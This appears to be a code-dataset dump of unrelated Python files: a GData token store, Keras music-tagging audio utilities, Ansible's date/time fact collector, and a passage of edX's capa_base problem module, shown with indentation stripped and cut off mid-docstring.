import atom.http_interface
import atom.url
SCOPE_ALL = 'http'
class TokenStore(object):
"""Manages Authorization tokens which will be sent in HTTP headers."""
def __init__(self, scoped_tokens=None):
self._tokens = scoped_tokens or {}
def add_token(self, token):
"""Adds a new token to the store (replaces tokens with the same scope).
Args:
token: A subclass of http_interface.GenericToken. The token object is
responsible for adding the Authorization header to the HTTP request.
The scopes defined in the token are used to determine if the token
is valid for a requested scope when find_token is called.
Returns:
True if the token was added, False if the token was not added becase
no scopes were provided.
"""
if not hasattr(token, 'scopes') or not token.scopes:
return False
for scope in token.scopes:
self._tokens[str(scope)] = token
return True
def find_token(self, url):
"""Selects an Authorization header token which can be used for the URL.
Args:
url: str or atom.url.Url or a list containing the same.
The URL which is going to be requested. All
tokens are examined to see if any scopes begin match the beginning
of the URL. The first match found is returned.
Returns:
The token object which should execute the HTTP request. If there was
no token for the url (the url did not begin with any of the token
scopes available), then the atom.http_interface.GenericToken will be
returned because the GenericToken calls through to the http client
without adding an Authorization header.
"""
if url is None:
return None
if isinstance(url, (str, unicode)):
url = atom.url.parse_url(url)
if url in self._tokens:
token = self._tokens[url]
if token.valid_for_scope(url):
return token
else:
del self._tokens[url]
for scope, token in self._tokens.iteritems():
if token.valid_for_scope(url):
return token
return atom.http_interface.GenericToken()
def remove_token(self, token):
"""Removes the token from the token_store.
This method is used when a token is determined to be invalid. If the
token was found by find_token, but resulted in a 401 or 403 error stating
that the token was invlid, then the token should be removed to prevent
future use.
Returns:
True if a token was found and then removed from the token
store. False if the token was not in the TokenStore.
"""
token_found = False
scopes_to_delete = []
for scope, stored_token in self._tokens.iteritems():
if stored_token == token:
scopes_to_delete.append(scope)
token_found = True
for scope in scopes_to_delete:
del self._tokens[scope]
return token_found
def remove_all_tokens(self):
self._tokens = {}
| agpl-3.0 |
dolaameng/keras | keras/applications/audio_conv_utils.py | 3 | 2767 | import numpy as np
from .. import backend as K
TAGS = ['rock', 'pop', 'alternative', 'indie', 'electronic',
'female vocalists', 'dance', '00s', 'alternative rock', 'jazz',
'beautiful', 'metal', 'chillout', 'male vocalists',
'classic rock', 'soul', 'indie rock', 'Mellow', 'electronica',
'80s', 'folk', '90s', 'chill', 'instrumental', 'punk',
'oldies', 'blues', 'hard rock', 'ambient', 'acoustic',
'experimental', 'female vocalist', 'guitar', 'Hip-Hop',
'70s', 'party', 'country', 'easy listening',
'sexy', 'catchy', 'funk', 'electro', 'heavy metal',
'Progressive rock', '60s', 'rnb', 'indie pop',
'sad', 'House', 'happy']
def librosa_exists():
try:
__import__('librosa')
except ImportError:
return False
else:
return True
def preprocess_input(audio_path, dim_ordering='default'):
'''Reads an audio file and outputs a Mel-spectrogram.
'''
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
assert dim_ordering in {'tf', 'th'}
if librosa_exists():
import librosa
else:
raise RuntimeError('Librosa is required to process audio files.\n' +
'Install it via `pip install librosa` \nor visit ' +
'http://librosa.github.io/librosa/ for details.')
# mel-spectrogram parameters
SR = 12000
N_FFT = 512
N_MELS = 96
HOP_LEN = 256
DURA = 29.12
src, sr = librosa.load(audio_path, sr=SR)
n_sample = src.shape[0]
n_sample_wanted = int(DURA * SR)
# trim the signal at the center
if n_sample < n_sample_wanted: # if too short
src = np.hstack((src, np.zeros((int(DURA * SR) - n_sample,))))
elif n_sample > n_sample_wanted: # if too long
src = src[(n_sample - n_sample_wanted) / 2:
(n_sample + n_sample_wanted) / 2]
logam = librosa.logamplitude
melgram = librosa.feature.melspectrogram
x = logam(melgram(y=src, sr=SR, hop_length=HOP_LEN,
n_fft=N_FFT, n_mels=N_MELS) ** 2,
ref_power=1.0)
if dim_ordering == 'th':
x = np.expand_dims(x, axis=0)
elif dim_ordering == 'tf':
x = np.expand_dims(x, axis=3)
return x
def decode_predictions(preds, top_n=5):
'''Decode the output of a music tagger model.
# Arguments
preds: 2-dimensional numpy array
top_n: integer in [0, 50], number of items to show
'''
assert len(preds.shape) == 2 and preds.shape[1] == 50
results = []
for pred in preds:
result = zip(TAGS, pred)
result = sorted(result, key=lambda x: x[1], reverse=True)
results.append(result[:top_n])
return results
| mit |
drmrd/ansible | lib/ansible/module_utils/facts/system/date_time.py | 197 | 2597 | # Data and time related facts collection for ansible.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import datetime
import time
from ansible.module_utils.facts.collector import BaseFactCollector
class DateTimeFactCollector(BaseFactCollector):
name = 'date_time'
_fact_ids = set()
def collect(self, module=None, collected_facts=None):
facts_dict = {}
date_time_facts = {}
now = datetime.datetime.now()
date_time_facts['year'] = now.strftime('%Y')
date_time_facts['month'] = now.strftime('%m')
date_time_facts['weekday'] = now.strftime('%A')
date_time_facts['weekday_number'] = now.strftime('%w')
date_time_facts['weeknumber'] = now.strftime('%W')
date_time_facts['day'] = now.strftime('%d')
date_time_facts['hour'] = now.strftime('%H')
date_time_facts['minute'] = now.strftime('%M')
date_time_facts['second'] = now.strftime('%S')
date_time_facts['epoch'] = now.strftime('%s')
if date_time_facts['epoch'] == '' or date_time_facts['epoch'][0] == '%':
# NOTE: in this case, the epoch wont match the rest of the date_time facts? ie, it's a few milliseconds later..? -akl
date_time_facts['epoch'] = str(int(time.time()))
date_time_facts['date'] = now.strftime('%Y-%m-%d')
date_time_facts['time'] = now.strftime('%H:%M:%S')
date_time_facts['iso8601_micro'] = now.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%fZ")
date_time_facts['iso8601'] = now.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
date_time_facts['iso8601_basic'] = now.strftime("%Y%m%dT%H%M%S%f")
date_time_facts['iso8601_basic_short'] = now.strftime("%Y%m%dT%H%M%S")
date_time_facts['tz'] = time.strftime("%Z")
date_time_facts['tz_offset'] = time.strftime("%z")
facts_dict['date_time'] = date_time_facts
return facts_dict
| gpl-3.0 |
fly19890211/edx-platform | common/lib/xmodule/xmodule/capa_base.py | 10 | 62110 | """Implements basics of Capa, including class CapaModule."""
import cgi
import copy
import datetime
import hashlib
import json
import logging
import os
import traceback
import struct
import sys
import re
# We don't want to force a dependency on datadog, so make the import conditional
try:
import dogstats_wrapper as dog_stats_api
except ImportError:
# pylint: disable=invalid-name
dog_stats_api = None
from capa.capa_problem import LoncapaProblem, LoncapaSystem
from capa.responsetypes import StudentInputError, \
ResponseError, LoncapaProblemError
from capa.util import convert_files_to_filenames, get_inner_html_from_xpath
from .progress import Progress
from xmodule.exceptions import NotFoundError
from xblock.fields import Scope, String, Boolean, Dict, Integer, Float
from .fields import Timedelta, Date
from django.utils.timezone import UTC
from xmodule.capa_base_constants import RANDOMIZATION, SHOWANSWER
from django.conf import settings
log = logging.getLogger("edx.courseware")
# Make '_' a no-op so we can scrape strings
_ = lambda text: text
# Generate this many different variants of problems with rerandomize=per_student
NUM_RANDOMIZATION_BINS = 20
# Never produce more than this many different seeds, no matter what.
MAX_RANDOMIZATION_BINS = 1000
def randomization_bin(seed, problem_id):
"""
Pick a randomization bin for the problem given the user's seed and a problem id.
We do this because we only want e.g. 20 randomizations of a problem to make analytics
interesting. To avoid having sets of students that always get the same problems,
we'll combine the system's per-student seed with the problem id in picking the bin.
"""
r_hash = hashlib.sha1()
r_hash.update(str(seed))
r_hash.update(str(problem_id))
# get the first few digits of the hash, convert to an int, then mod.
return int(r_hash.hexdigest()[:7], 16) % NUM_RANDOMIZATION_BINS
class Randomization(String):
"""
Define a field to store how to randomize a problem.
"""
def from_json(self, value):
if value in ("", "true"):
return RANDOMIZATION.ALWAYS
elif value == "false":
return RANDOMIZATION.PER_STUDENT
return value
to_json = from_json
class ComplexEncoder(json.JSONEncoder):
"""
Extend the JSON encoder to correctly handle complex numbers
"""
def default(self, obj):
"""
Print a nicely formatted complex number, or default to the JSON encoder
"""
if isinstance(obj, complex):
return u"{real:.7g}{imag:+.7g}*j".format(real=obj.real, imag=obj.imag)
return json.JSONEncoder.default(self, obj)
class CapaFields(object):
"""
Define the possible fields for a Capa problem
"""
display_name = String(
display_name=_("Display Name"),
help=_("This name appears in the horizontal navigation at the top of the page."),
scope=Scope.settings,
# it'd be nice to have a useful default but it screws up other things; so,
# use display_name_with_default for those
default=_("Blank Advanced Problem")
)
attempts = Integer(
help=_("Number of attempts taken by the student on this problem"),
default=0,
scope=Scope.user_state)
max_attempts = Integer(
display_name=_("Maximum Attempts"),
help=_("Defines the number of times a student can try to answer this problem. "
"If the value is not set, infinite attempts are allowed."),
values={"min": 0}, scope=Scope.settings
)
due = Date(help=_("Date that this problem is due by"), scope=Scope.settings)
graceperiod = Timedelta(
help=_("Amount of time after the due date that submissions will be accepted"),
scope=Scope.settings
)
showanswer = String(
display_name=_("Show Answer"),
help=_("Defines when to show the answer to the problem. "
"A default value can be set in Advanced Settings."),
scope=Scope.settings,
default=SHOWANSWER.FINISHED,
values=[
{"display_name": _("Always"), "value": SHOWANSWER.ALWAYS},
{"display_name": _("Answered"), "value": SHOWANSWER.ANSWERED},
{"display_name": _("Attempted"), "value": SHOWANSWER.ATTEMPTED},
{"display_name": _("Closed"), "value": SHOWANSWER.CLOSED},
{"display_name": _("Finished"), "value": SHOWANSWER.FINISHED},
{"display_name": _("Correct or Past Due"), "value": SHOWANSWER.CORRECT_OR_PAST_DUE},
{"display_name": _("Past Due"), "value": SHOWANSWER.PAST_DUE},
{"display_name": _("Never"), "value": SHOWANSWER.NEVER}]
)
force_save_button = Boolean(
help=_("Whether to force the save button to appear on the page"),
scope=Scope.settings,
default=False
)
reset_key = "DEFAULT_SHOW_RESET_BUTTON"
default_reset_button = getattr(settings, reset_key) if hasattr(settings, reset_key) else False
show_reset_button = Boolean(
display_name=_("Show Reset Button"),
help=_("Determines whether a 'Reset' button is shown so the user may reset their answer. "
"A default value can be set in Advanced Settings."),
scope=Scope.settings,
default=default_reset_button
)
rerandomize = Randomization(
display_name=_("Randomization"),
help=_(
'Defines when to randomize the variables specified in the associated Python script. '
'For problems that do not randomize values, specify \"Never\". '
),
default=RANDOMIZATION.NEVER,
scope=Scope.settings,
values=[
{"display_name": _("Always"), "value": RANDOMIZATION.ALWAYS},
{"display_name": _("On Reset"), "value": RANDOMIZATION.ONRESET},
{"display_name": _("Never"), "value": RANDOMIZATION.NEVER},
{"display_name": _("Per Student"), "value": RANDOMIZATION.PER_STUDENT}
]
)
data = String(help=_("XML data for the problem"), scope=Scope.content, default="<problem></problem>")
correct_map = Dict(help=_("Dictionary with the correctness of current student answers"),
scope=Scope.user_state, default={})
input_state = Dict(help=_("Dictionary for maintaining the state of inputtypes"), scope=Scope.user_state)
student_answers = Dict(help=_("Dictionary with the current student responses"), scope=Scope.user_state)
done = Boolean(help=_("Whether the student has answered the problem"), scope=Scope.user_state)
seed = Integer(help=_("Random seed for this student"), scope=Scope.user_state)
last_submission_time = Date(help=_("Last submission time"), scope=Scope.user_state)
submission_wait_seconds = Integer(
display_name=_("Timer Between Attempts"),
help=_("Seconds a student must wait between submissions for a problem with multiple attempts."),
scope=Scope.settings,
default=0)
weight = Float(
display_name=_("Problem Weight"),
help=_("Defines the number of points each problem is worth. "
"If the value is not set, each response field in the problem is worth one point."),
values={"min": 0, "step": .1},
scope=Scope.settings
)
markdown = String(help=_("Markdown source of this module"), default=None, scope=Scope.settings)
source_code = String(
help=_("Source code for LaTeX and Word problems. This feature is not well-supported."),
scope=Scope.settings
)
text_customization = Dict(
help=_("String customization substitutions for particular locations"),
scope=Scope.settings
# TODO: someday it should be possible to not duplicate this definition here
# and in inheritance.py
)
use_latex_compiler = Boolean(
help=_("Enable LaTeX templates?"),
default=False,
scope=Scope.settings
)
matlab_api_key = String(
display_name=_("Matlab API key"),
help=_("Enter the API key provided by MathWorks for accessing the MATLAB Hosted Service. "
"This key is granted for exclusive use by this course for the specified duration. "
"Please do not share the API key with other courses and notify MathWorks immediately "
"if you believe the key is exposed or compromised. To obtain a key for your course, "
"or to report an issue, please contact moocsupport@mathworks.com"),
scope=Scope.settings
)
class CapaMixin(CapaFields):
"""
Core logic for Capa Problem, which can be used by XModules or XBlocks.
"""
def __init__(self, *args, **kwargs):
super(CapaMixin, self).__init__(*args, **kwargs)
due_date = self.due
if self.graceperiod is not None and due_date:
self.close_date = due_date + self.graceperiod
else:
self.close_date = due_date
if self.seed is None:
self.choose_new_seed()
# Need the problem location in openendedresponse to send out. Adding
# it to the system here seems like the least clunky way to get it
# there.
self.runtime.set('location', self.location.to_deprecated_string())
try:
# TODO (vshnayder): move as much as possible of this work and error
# checking to descriptor load time
self.lcp = self.new_lcp(self.get_state_for_lcp())
# At this point, we need to persist the randomization seed
# so that when the problem is re-loaded (to check/view/save)
# it stays the same.
# However, we do not want to write to the database
# every time the module is loaded.
# So we set the seed ONLY when there is not one set already
if self.seed is None:
self.seed = self.lcp.seed
except Exception as err: # pylint: disable=broad-except
msg = u'cannot create LoncapaProblem {loc}: {err}'.format(
loc=self.location.to_deprecated_string(), err=err)
# TODO (vshnayder): do modules need error handlers too?
# We shouldn't be switching on DEBUG.
if self.runtime.DEBUG:
log.warning(msg)
# TODO (vshnayder): This logic should be general, not here--and may
# want to preserve the data instead of replacing it.
# e.g. in the CMS
msg = u'<p>{msg}</p>'.format(msg=cgi.escape(msg))
msg += u'<p><pre>{tb}</pre></p>'.format(
# just the traceback, no message - it is already present above
tb=cgi.escape(
u''.join(
['Traceback (most recent call last):\n'] +
traceback.format_tb(sys.exc_info()[2])
)
)
)
# create a dummy problem with error message instead of failing
problem_text = (u'<problem><text><span class="inline-error">'
u'Problem {url} has an error:</span>{msg}</text></problem>'.format(
url=self.location.to_deprecated_string(),
msg=msg)
)
self.lcp = self.new_lcp(self.get_state_for_lcp(), text=problem_text)
else:
# add extra info and raise
raise Exception(msg), None, sys.exc_info()[2]
self.set_state_from_lcp()
assert self.seed is not None
def choose_new_seed(self):
"""
Choose a new seed.
"""
if self.rerandomize == RANDOMIZATION.NEVER:
self.seed = 1
elif self.rerandomize == RANDOMIZATION.PER_STUDENT and hasattr(self.runtime, 'seed'):
# see comment on randomization_bin
self.seed = randomization_bin(self.runtime.seed, unicode(self.location).encode('utf-8'))
else:
self.seed = struct.unpack('i', os.urandom(4))[0]
# So that sandboxed code execution can be cached, but still have an interesting
# number of possibilities, cap the number of different random seeds.
self.seed %= MAX_RANDOMIZATION_BINS
def new_lcp(self, state, text=None):
"""
Generate a new Loncapa Problem
"""
if text is None:
text = self.data
capa_system = LoncapaSystem(
ajax_url=self.runtime.ajax_url,
anonymous_student_id=self.runtime.anonymous_student_id,
cache=self.runtime.cache,
can_execute_unsafe_code=self.runtime.can_execute_unsafe_code,
get_python_lib_zip=self.runtime.get_python_lib_zip,
DEBUG=self.runtime.DEBUG,
filestore=self.runtime.filestore,
i18n=self.runtime.service(self, "i18n"),
node_path=self.runtime.node_path,
render_template=self.runtime.render_template,
seed=self.runtime.seed, # Why do we do this if we have self.seed?
STATIC_URL=self.runtime.STATIC_URL,
xqueue=self.runtime.xqueue,
matlab_api_key=self.matlab_api_key
)
return LoncapaProblem(
problem_text=text,
id=self.location.html_id(),
state=state,
seed=self.seed,
capa_system=capa_system,
capa_module=self, # njp
)
def get_state_for_lcp(self):
"""
Give a dictionary holding the state of the module
"""
return {
'done': self.done,
'correct_map': self.correct_map,
'student_answers': self.student_answers,
'input_state': self.input_state,
'seed': self.seed,
}
def set_state_from_lcp(self):
"""
Set the module's state from the settings in `self.lcp`
"""
lcp_state = self.lcp.get_state()
self.done = lcp_state['done']
self.correct_map = lcp_state['correct_map']
self.input_state = lcp_state['input_state']
self.student_answers = lcp_state['student_answers']
self.seed = lcp_state['seed']
def set_last_submission_time(self):
"""
Set the module's last submission time (when the problem was checked)
"""
self.last_submission_time = datetime.datetime.now(UTC())
def get_score(self):
"""
Access the problem's score
"""
return self.lcp.get_score()
def max_score(self):
"""
Access the problem's max score
"""
return self.lcp.get_max_score()
def get_progress(self):
"""
For now, just return score / max_score
"""
score_dict = self.get_score()
score = score_dict['score']
total = score_dict['total']
if total > 0:
if self.weight is not None:
# Progress objects expect total > 0
if self.weight == 0:
return None
# scale score and total by weight/total:
score = score * self.weight / total
total = self.weight
try:
return Progress(score, total)
except (TypeError, ValueError):
log.exception("Got bad progress")
return None
return None
def get_html(self):
"""
Return some html with data about the module
"""
progress = self.get_progress()
return self.runtime.render_template('problem_ajax.html', {
'element_id': self.location.html_id(),
'id': self.location.to_deprecated_string(),
'ajax_url': self.runtime.ajax_url,
'progress_status': Progress.to_js_status_str(progress),
'progress_detail': Progress.to_js_detail_str(progress),
})
def check_button_name(self):
"""
Determine the name for the "check" button.
Usually it is just "Check", but if this is the student's
final attempt, change the name to "Final Check".
The text can be customized by the text_customization setting.
"""
# The logic flow is a little odd so that _('xxx') strings can be found for
# translation while also running _() just once for each string.
_ = self.runtime.service(self, "i18n").ugettext
check = _('Check')
final_check = _('Final Check')
# Apply customizations if present
if 'custom_check' in self.text_customization:
check = _(self.text_customization.get('custom_check')) # pylint: disable=translation-of-non-string
if 'custom_final_check' in self.text_customization:
final_check = _(self.text_customization.get('custom_final_check')) # pylint: disable=translation-of-non-string
# TODO: need a way to get the customized words into the list of
# words to be translated
if self.max_attempts is not None and self.attempts >= self.max_attempts - 1:
return final_check
else:
return check
def check_button_checking_name(self):
"""
Return the "checking..." text for the "check" button.
After the user presses the "check" button, the button will briefly
display the value returned by this function until a response is
received by the server.
The text can be customized by the text_customization setting.
"""
# Apply customizations if present
if 'custom_checking' in self.text_customization:
return self.text_customization.get('custom_checking')
_ = self.runtime.service(self, "i18n").ugettext
return _('Checking...')
def should_show_check_button(self):
"""
Return True/False to indicate whether to show the "Check" button.
"""
submitted_without_reset = (self.is_submitted() and self.rerandomize == RANDOMIZATION.ALWAYS)
# If the problem is closed (past due / too many attempts)
# then we do NOT show the "check" button
# Also, do not show the "check" button if we're waiting
# for the user to reset a randomized problem
if self.closed() or submitted_without_reset:
return False
else:
return True
def should_show_reset_button(self):
"""
Return True/False to indicate whether to show the "Reset" button.
"""
is_survey_question = (self.max_attempts == 0)
# If the problem is closed (and not a survey question with max_attempts==0),
# then do NOT show the reset button.
if self.closed() and not is_survey_question:
return False
# Button only shows up for randomized problems if the question has been submitted
if self.rerandomize in [RANDOMIZATION.ALWAYS, RANDOMIZATION.ONRESET] and self.is_submitted():
return True
else:
# Do NOT show the button if the problem is correct
if self.is_correct():
return False
else:
return self.show_reset_button
def should_show_save_button(self):
"""
Return True/False to indicate whether to show the "Save" button.
"""
# If the user has forced the save button to display,
# then show it as long as the problem is not closed
# (past due / too many attempts)
if self.force_save_button:
return not self.closed()
else:
is_survey_question = (self.max_attempts == 0)
needs_reset = self.is_submitted() and self.rerandomize == RANDOMIZATION.ALWAYS
# If the student has unlimited attempts, and their answers
# are not randomized, then we do not need a save button
# because they can use the "Check" button without consequences.
#
# The consequences we want to avoid are:
# * Using up an attempt (if max_attempts is set)
# * Changing the current problem, and no longer being
# able to view it (if rerandomize is "always")
#
# In those cases. the if statement below is false,
# and the save button can still be displayed.
#
if self.max_attempts is None and self.rerandomize != RANDOMIZATION.ALWAYS:
return False
# If the problem is closed (and not a survey question with max_attempts==0),
# then do NOT show the save button
# If we're waiting for the user to reset a randomized problem
# then do NOT show the save button
elif (self.closed() and not is_survey_question) or needs_reset:
return False
else:
return True
def handle_problem_html_error(self, err):
"""
Create a dummy problem to represent any errors.
Change our problem to a dummy problem containing a warning message to
display to users. Returns the HTML to show to users
`err` is the Exception encountered while rendering the problem HTML.
"""
log.exception(err.message)
# TODO (vshnayder): another switch on DEBUG.
if self.runtime.DEBUG:
msg = (
u'[courseware.capa.capa_module] <font size="+1" color="red">'
u'Failed to generate HTML for problem {url}</font>'.format(
url=cgi.escape(self.location.to_deprecated_string()))
)
msg += u'<p>Error:</p><p><pre>{msg}</pre></p>'.format(msg=cgi.escape(err.message))
msg += u'<p><pre>{tb}</pre></p>'.format(tb=cgi.escape(traceback.format_exc()))
html = msg
else:
# We're in non-debug mode, and possibly even in production. We want
# to avoid bricking of problem as much as possible
# Presumably, student submission has corrupted LoncapaProblem HTML.
# First, pull down all student answers
student_answers = self.lcp.student_answers
answer_ids = student_answers.keys()
# Some inputtypes, such as dynamath, have additional "hidden" state that
# is not exposed to the student. Keep those hidden
# TODO: Use regex, e.g. 'dynamath' is suffix at end of answer_id
hidden_state_keywords = ['dynamath']
for answer_id in answer_ids:
for hidden_state_keyword in hidden_state_keywords:
if answer_id.find(hidden_state_keyword) >= 0:
student_answers.pop(answer_id)
# Next, generate a fresh LoncapaProblem
self.lcp = self.new_lcp(None)
self.set_state_from_lcp()
# Prepend a scary warning to the student
_ = self.runtime.service(self, "i18n").ugettext
warning_msg = _("Warning: The problem has been reset to its initial state!")
warning = '<div class="capa_reset"> <h2> ' + warning_msg + '</h2>'
# Translators: Following this message, there will be a bulleted list of items.
warning_msg = _("The problem's state was corrupted by an invalid submission. The submission consisted of:")
warning += warning_msg + '<ul>'
for student_answer in student_answers.values():
if student_answer != '':
warning += '<li>' + cgi.escape(student_answer) + '</li>'
warning_msg = _('If this error persists, please contact the course staff.')
warning += '</ul>' + warning_msg + '</div>'
html = warning
try:
html += self.lcp.get_html()
except Exception: # pylint: disable=broad-except
# Couldn't do it. Give up.
log.exception("Unable to generate html from LoncapaProblem")
raise
return html
def get_demand_hint(self, hint_index):
"""
Return html for the problem.
Adds check, reset, save, and hint buttons as necessary based on the problem config
and state.
encapsulate: if True (the default) embed the html in a problem <div>
hint_index: (None is the default) if not None, this is the index of the next demand
hint to show.
"""
demand_hints = self.lcp.tree.xpath("//problem/demandhint/hint")
hint_index = hint_index % len(demand_hints)
_ = self.runtime.service(self, "i18n").ugettext # pylint: disable=redefined-outer-name
hint_element = demand_hints[hint_index]
hint_text = get_inner_html_from_xpath(hint_element)
if len(demand_hints) == 1:
prefix = _('Hint: ')
else:
# Translators: e.g. "Hint 1 of 3" meaning we are showing the first of three hints.
prefix = _('Hint ({hint_num} of {hints_count}): ').format(hint_num=hint_index + 1,
hints_count=len(demand_hints))
# Log this demand-hint request
event_info = dict()
event_info['module_id'] = self.location.to_deprecated_string()
event_info['hint_index'] = hint_index
event_info['hint_len'] = len(demand_hints)
event_info['hint_text'] = hint_text
self.runtime.track_function('edx.problem.hint.demandhint_displayed', event_info)
# We report the index of this hint, the client works out what index to use to get the next hint
return {
'success': True,
'contents': prefix + hint_text,
'hint_index': hint_index
}
def get_problem_html(self, encapsulate=True):
"""
Return html for the problem.
Adds check, reset, save, and hint buttons as necessary based on the problem config
and state.
encapsulate: if True (the default) embed the html in a problem <div>
"""
try:
html = self.lcp.get_html()
# If we cannot construct the problem HTML,
# then generate an error message instead.
except Exception as err: # pylint: disable=broad-except
html = self.handle_problem_html_error(err)
html = self.remove_tags_from_html(html)
# The convention is to pass the name of the check button if we want
# to show a check button, and False otherwise This works because
# non-empty strings evaluate to True. We use the same convention
# for the "checking" state text.
if self.should_show_check_button():
check_button = self.check_button_name()
check_button_checking = self.check_button_checking_name()
else:
check_button = False
check_button_checking = False
content = {
'name': self.display_name_with_default,
'html': html,
'weight': self.weight,
}
# If demand hints are available, emit hint button and div.
demand_hints = self.lcp.tree.xpath("//problem/demandhint/hint")
demand_hint_possible = len(demand_hints) > 0
context = {
'problem': content,
'id': self.location.to_deprecated_string(),
'check_button': check_button,
'check_button_checking': check_button_checking,
'reset_button': self.should_show_reset_button(),
'save_button': self.should_show_save_button(),
'answer_available': self.answer_available(),
'attempts_used': self.attempts,
'attempts_allowed': self.max_attempts,
'demand_hint_possible': demand_hint_possible
}
html = self.runtime.render_template('problem.html', context)
if encapsulate:
html = u'<div id="problem_{id}" class="problem" data-url="{ajax_url}">'.format(
id=self.location.html_id(), ajax_url=self.runtime.ajax_url
) + html + "</div>"
# Now do all the substitutions which the LMS module_render normally does, but
# we need to do here explicitly since we can get called for our HTML via AJAX
html = self.runtime.replace_urls(html)
if self.runtime.replace_course_urls:
html = self.runtime.replace_course_urls(html)
if self.runtime.replace_jump_to_id_urls:
html = self.runtime.replace_jump_to_id_urls(html)
return html
def remove_tags_from_html(self, html):
"""
The capa xml includes many tags such as <additional_answer> or <demandhint> which are not
meant to be part of the client html. We strip them all and return the resulting html.
"""
tags = ['demandhint', 'choicehint', 'optionhint', 'stringhint', 'numerichint', 'optionhint',
'correcthint', 'regexphint', 'additional_answer', 'stringequalhint', 'compoundhint',
'stringequalhint']
for tag in tags:
html = re.sub(r'<%s.*?>.*?</%s>' % (tag, tag), '', html, flags=re.DOTALL)
# Some of these tags span multiple lines
# Note: could probably speed this up by calling sub() once with a big regex
# vs. simply calling sub() many times as we have here.
return html
def hint_button(self, data):
"""
Hint button handler, returns new html using hint_index from the client.
"""
hint_index = int(data['hint_index'])
return self.get_demand_hint(hint_index)
def is_past_due(self):
"""
Is it now past this problem's due date, including grace period?
"""
return (self.close_date is not None and
datetime.datetime.now(UTC()) > self.close_date)
def closed(self):
"""
Is the student still allowed to submit answers?
"""
if self.max_attempts is not None and self.attempts >= self.max_attempts:
return True
if self.is_past_due():
return True
return False
def is_submitted(self):
"""
Used to decide to show or hide RESET or CHECK buttons.
Means that student submitted problem and nothing more.
Problem can be completely wrong.
Pressing RESET button makes this function to return False.
"""
# used by conditional module
return self.lcp.done
def is_attempted(self):
"""
Has the problem been attempted?
used by conditional module
"""
return self.attempts > 0
def is_correct(self):
"""
True iff full points
"""
score_dict = self.get_score()
return score_dict['score'] == score_dict['total']
def answer_available(self):
"""
Is the user allowed to see an answer?
"""
if self.showanswer == '':
return False
elif self.showanswer == SHOWANSWER.NEVER:
return False
elif self.runtime.user_is_staff:
# This is after the 'never' check because admins can see the answer
# unless the problem explicitly prevents it
return True
elif self.showanswer == SHOWANSWER.ATTEMPTED:
return self.attempts > 0
elif self.showanswer == SHOWANSWER.ANSWERED:
# NOTE: this is slightly different from 'attempted' -- resetting the problems
# makes lcp.done False, but leaves attempts unchanged.
return self.lcp.done
elif self.showanswer == SHOWANSWER.CLOSED:
return self.closed()
elif self.showanswer == SHOWANSWER.FINISHED:
return self.closed() or self.is_correct()
elif self.showanswer == SHOWANSWER.CORRECT_OR_PAST_DUE:
return self.is_correct() or self.is_past_due()
elif self.showanswer == SHOWANSWER.PAST_DUE:
return self.is_past_due()
elif self.showanswer == SHOWANSWER.ALWAYS:
return True
return False
def update_score(self, data):
"""
Delivers grading response (e.g. from asynchronous code checking) to
the capa problem, so its score can be updated
'data' must have a key 'response' which is a string that contains the
grader's response
No ajax return is needed. Return empty dict.
"""
queuekey = data['queuekey']
score_msg = data['xqueue_body']
self.lcp.update_score(score_msg, queuekey)
self.set_state_from_lcp()
self.publish_grade()
return dict() # No AJAX return is needed
def handle_ungraded_response(self, data):
"""
Delivers a response from the XQueue to the capa problem
The score of the problem will not be updated
Args:
- data (dict) must contain keys:
queuekey - a key specific to this response
xqueue_body - the body of the response
Returns:
empty dictionary
No ajax return is needed, so an empty dict is returned
"""
queuekey = data['queuekey']
score_msg = data['xqueue_body']
# pass along the xqueue message to the problem
self.lcp.ungraded_response(score_msg, queuekey)
self.set_state_from_lcp()
return dict()
def handle_input_ajax(self, data):
"""
Handle ajax calls meant for a particular input in the problem
Args:
- data (dict) - data that should be passed to the input
Returns:
- dict containing the response from the input
"""
response = self.lcp.handle_input_ajax(data)
# save any state changes that may occur
self.set_state_from_lcp()
return response
def get_answer(self, _data):
"""
For the "show answer" button.
Returns the answers: {'answers' : answers}
"""
event_info = dict()
event_info['problem_id'] = self.location.to_deprecated_string()
self.track_function_unmask('showanswer', event_info)
if not self.answer_available():
raise NotFoundError('Answer is not available')
else:
answers = self.lcp.get_question_answers()
self.set_state_from_lcp()
# answers (eg <solution>) may have embedded images
# but be careful, some problems are using non-string answer dicts
new_answers = dict()
for answer_id in answers:
try:
answer_content = self.runtime.replace_urls(answers[answer_id])
if self.runtime.replace_jump_to_id_urls:
answer_content = self.runtime.replace_jump_to_id_urls(answer_content)
new_answer = {answer_id: answer_content}
except TypeError:
log.debug(u'Unable to perform URL substitution on answers[%s]: %s',
answer_id, answers[answer_id])
new_answer = {answer_id: answers[answer_id]}
new_answers.update(new_answer)
return {'answers': new_answers}
# Figure out if we should move these to capa_problem?
def get_problem(self, _data):
"""
Return results of get_problem_html, as a simple dict for json-ing.
{ 'html': <the-html> }
Used if we want to reconfirm we have the right thing e.g. after
several AJAX calls.
"""
return {'html': self.get_problem_html(encapsulate=False)}
@staticmethod
def make_dict_of_responses(data):
"""
Make dictionary of student responses (aka "answers")
`data` is POST dictionary (webob.multidict.MultiDict).
The `data` dict has keys of the form 'x_y', which are mapped
to key 'y' in the returned dict. For example,
'input_1_2_3' would be mapped to '1_2_3' in the returned dict.
Some inputs always expect a list in the returned dict
(e.g. checkbox inputs). The convention is that
keys in the `data` dict that end with '[]' will always
have list values in the returned dict.
For example, if the `data` dict contains {'input_1[]': 'test' }
then the output dict would contain {'1': ['test'] }
(the value is a list).
Some other inputs such as ChoiceTextInput expect a dict of values in the returned
dict If the key ends with '{}' then we will assume that the value is a json
encoded dict and deserialize it.
For example, if the `data` dict contains {'input_1{}': '{"1_2_1": 1}'}
then the output dict would contain {'1': {"1_2_1": 1} }
(the value is a dictionary)
Raises an exception if:
-A key in the `data` dictionary does not contain at least one underscore
